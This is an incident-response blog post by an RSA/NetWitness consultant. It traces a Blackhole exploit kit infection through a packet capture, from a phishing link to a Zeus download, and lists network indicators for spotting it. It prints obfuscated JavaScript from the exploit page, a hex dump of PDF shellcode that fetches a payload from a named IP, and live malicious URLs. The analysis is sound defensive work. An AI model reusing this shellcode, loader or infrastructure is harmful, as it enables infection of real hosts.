By Grant Warkins Advisory Practice Consultant RSA/NetWitness Incident Response

Based on the last few Incident Response engagements I’ve participated in, the most common question I’ve heard is “what are the common indicators you are using to find evil?” This is not a question that has a simple answer.  In this blog post, I’ll examine a Blackhole exploit kit session and discuss the various network indicators that analysts should be looking for when identifying host exploitation and associated binaries.   The intent here is not to pick apart malware or de-obfuscate JavaScript, but to show how asking simple questions about your network traffic can reveal the bad stuff being missed by your other security products.

For this exercise, I’m utilizing a packet capture (PCAP) associated with a zero day exploit used by the Blackhole exploit kit 2.0.  This PCAP can be found on the Contagio malware repository managed by Mila Parkour[1].

This scenario begins with a phishing email attempting to spoof correspondence with a popular data processing outsourcing provider.  A user that clicks on the link with Firefox as the default browser will initiate the following HTTP GET request:

Figure 1

Figure 1: Initial HTTP GET Request

The response is a common indicator of a Blackhole exploit kit landing page, as noted by the text “WAIT PLEASE Loading…”, followed by JavaScript pointing to links associated with active redirectors.

Figure 2: Example of Blackhole Exploit Kit Landing Page

Figure 2: Example of Blackhole Exploit Kit Landing Page

NOTE: Be careful when building IDS rules based on the HTML text above due to the high possibility of false positives. However, note that the folder names in the URL path contain 8 random alphanumeric characters.

Figure 3: Sample GET Request From Landing Page

Figure 3: Sample GET Request From Landing Page

Both URLs point to the same redirector containing the exploits to be served to the host:

Figure 4: Redirector Points to Host Containing Exploits

Figure 4: Redirector Points to Host Containing Exploits

NOTE:  The ETag associated with this file was also found in PCAPs associated with other redirectors and could provide a useful indicator to be used in an IDS signature.

As shown in the GET request below, a common red flag for analysts to review is an HTTP GET request directly to an IP address.  While there are occasions where this is normal, it’s a good practice to verify that a direct HTTP request to an IP is benign.

Figure 5: Get Request Sent to Server Containing Exploit Code

Figure 5: Get Request Sent to Server Containing Exploit Code

Accessing this page dynamically generates heavily obfuscated JavaScript containing a URL pointing to PDF and Java exploits (Decoding this JavaScript will be discussed in a future blog post).

HTTP/1.1 200 OKServer: nginx/0.7.67Date: Wed, 19 Sep 2012 02:41:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-alive

X-Powered-By: PHP/5.3.14-1~dotdeb.0

 

Content-Length: 27513<html><body><applet archive=”http://69.194.193.34/data/java.

jar” code=”fbeatbea.fbeatbed”><param value=”N0b0909041f3131343e3c373e2b3c373e083c

***(removed code)***

^44303l3p3h*3r45441c3h&3q3g3b423h_3g3l423h3f@441g201k1k%1k1d23″></u><script>

a=document[g](“google”)[gg](“data”);

a=a.replace(/[^0-9a-z]/g,””);

s=””;

for(i=0;i<a.length;i+=2){

if(020==0×10)s+=String.fromCharCode(parseInt(a.substr(i,2),28));}

try{(alert+””)()}catch(adgsdg){eval(s);}

</script></body></html>

Figure 6: Sample of Obfuscated JavaScript and Associated Jar File

Two of the links generated point to an unsuccessful PDF exploit for CVE-2010-0188:

  • 69.194.193.34/links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07.
  • 69.194.193.34/systems-links_warns.php?nfezhok=0906343704&sbipbq=3dzz7ecg=35353306040934370b06&qara=0b0007000400040b07.  This appears to be a second attempt due to the first being unsuccessful.

The PDFs contain the following shellcode, which contains the URL for the downloader:

Hexadecimal

ASCII

4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a

a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41

26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41

41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33

c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33

db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8

8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51

e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b

76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be

10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75

e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54

24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb

53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68

08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00

00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50

55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00

68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff

ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c

c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7

44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c

8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d

05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88

44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14

85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53

ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa

47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe

ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca

8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f

2f 36 39 2e 31 39 34 2e  31 39 33 2e 33 34 2f 6c

69 6e 6b 73 2f 73 79 73  74 65 6d 73 2d 6c 69 6e

6b 73 5f 77 61 72 6e 73  2e 70 68 70 3f 75 73 65

6c 72 6a 75 3d 30 32 30  36 33 36 30 32 30 33 26

72 6c 76 62 3d 33 35 33  35 33 33 30 36 30 34 30

39 33 34 33 37 30 62 30  36 26 63 73 79 6d 76 3d

30 33 26 79 68 76 71 74  77 3d 6b 74 6b 76 26 77

63 69 6f 6a 64 73 3d 63  6b 67 61 77 6f 77 00 00

L.`….J<.`..c.J

…J0..Jn/.JAAAA

&……………

.9.Jd.`…..AAAA

AAAAf……u4._3

.d.@0.@..p.V.v.3

.f.^<.t3,…….

.@0.F9.u..4$..uQ

..LQV.u<.t5x..V.

v…3.IA….3…

.8.t……@..;.u

.^.^$..f..K.F..T

$………..^Y..

S..h..}.3t…..h

…j.Y……….

..XPj@h….P…P

U…^……hon..

hurlmT……..a.

…..r…….\$.

..$regs.D$.vr32.

D$..-s.Sh…..V.

..3.Q.D..wpbt.D.

..dll.D…Y…0.

D..AQj.j.SWj..V.

..u.j.S.V.j….S

.V……..G.?.u.

G.?.u.j.j..V….

…N…….o..3.

.[..Fy6./phttp:/

/69.194.193.34/l

inks/systems-lin

ks_warns.php?use

lrju=0206360203&

rlvb=35353306040

934370b06&csymv=

03&yhvqtw=ktkv&w

ciojds=ckgawow..

Figure 7:  Exploit Code From Malicious PDF

The third link accessed is associated with a Java JAR file that contained exploit code for CVE-2012-1723 and CVE-2012-4681 (Additional review of the JAR file will also be covered in a separate blog).  The successful exploit causes the host to download the dropper “calc.exe” from 69.194.193.34/links/systems-links_warns.php?tf=0206360203&le=35353306040934370b06&i=02&jy=b&fg=h.

Figure 8: Get Request for Downloader

NOTE:  Another red flag for network analysis is shown above with the inclusion of Java/1.7.0_06 being referenced in the User-Agent field.  Outside of Java updates, it is not normal to see this and the associated sessions should be reviewed.The response contains additional red flags that should be also be considered:

Figure 9: Response to HTTP GET Request for the Downloader
Figure 9: Response to HTTP GET Request for the Downloader
  • Content-Type does not match what was in the Accept field in the GET request.
  • Content-Disposition with filename.  This forces the save-as feature to download the file with that name and often indicates an automated download.

With the downloader now on the host and executed, we see it check-in:

grantblog10
Figure 10: Encrypted HTTP POST From Downloader

NOTE:  The above HTTP POST contains several red flags:

  • The User-Agent string contains Windows 98.
  • HTTP POST direct to an IP.
  • HTTP POST without an associated referrer field.
  • HTTP POST header contains HTTP/1.0.  This is not normally seen associated with modern browsers or tools.
Figure 10: Encrypted HTTP POST From Downloader
Figure 11: Downloader C2 Response

With the check-in complete, it pulls down the Zeus Trojan

Figure 12: HTTP GET Request for Zeus
Figure 12: HTTP GET Request for Zeus
Figure 13: Response to HTTP GET Request for Zeus
Figure 13: Response to HTTP GET Request for Zeus

Finally, we see random UDP data being sent to seemingly random IP addresses, which is a good indicator that the Zeus version downloaded was P2P capable, without having to statically analyze it.

ip.dst = 79.14.79.134ip.proto = 17udp.srcport = 18707udp.dstport = 24815service = 0streams = 1packets = 1

lifetime = 0

country.dst = Italy

city.dst = Verona

latdec.dst = 45.45

longdec.dst = 11

org.dst = Telecom Italia

domain.dst = telecomitalia.it

Figure 14: Sample Zeus P2P Packet Metadata

So, just from quickly analyzing the Blackhole exploit kit in action, we’ve identified several key network indicators that analysts should keep an eye out for.  These indicators can be easily automated by your tool of choice, be it an IDS or a NetWitness Decoder and can be grouped to reduce the amount of false positive hits.  Additionally, products such as NetWitness are migrating to a unified analytics approach, which are automating the implementation of well-known indicators as they become known within the malware intelligence community.  The table below summarizes the network indicators we’ve identified:

Figure 15: Sample P2P Data Sent By Zeus
Figure 15: Sample P2P Data Sent By Zeus
Network Indicator False Positive Rate
HTTP GET requests with folder names containing 8 random alpha numeric characters High False Positive Rate
HTTP Response containing “<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>”
High False Positive Rate
Signature based on a specific HTTP ETag Low False Positive Rate
HTTP GET or POST direct to an IP Moderate False Positive Rate
client contains java && (filetype = ‘windows executable’) Low False Positive Rate
HTTP Content-Disposition with Filename Moderate False Positive Rate
User-Agent containing deprecated Operating Systems or browsers Low False Positive Rate
HTTP POST or GET without a referrer field Low False Positive Rate
HTTP Post referencing HTTP/1.0 Moderate False Positive Rate

Figure 16: Summary of Common Network Indicators


[1] http://contagiodump.blogspot.com/2012/09/cve-2012-4681-samples-original-apt-and.html

Author: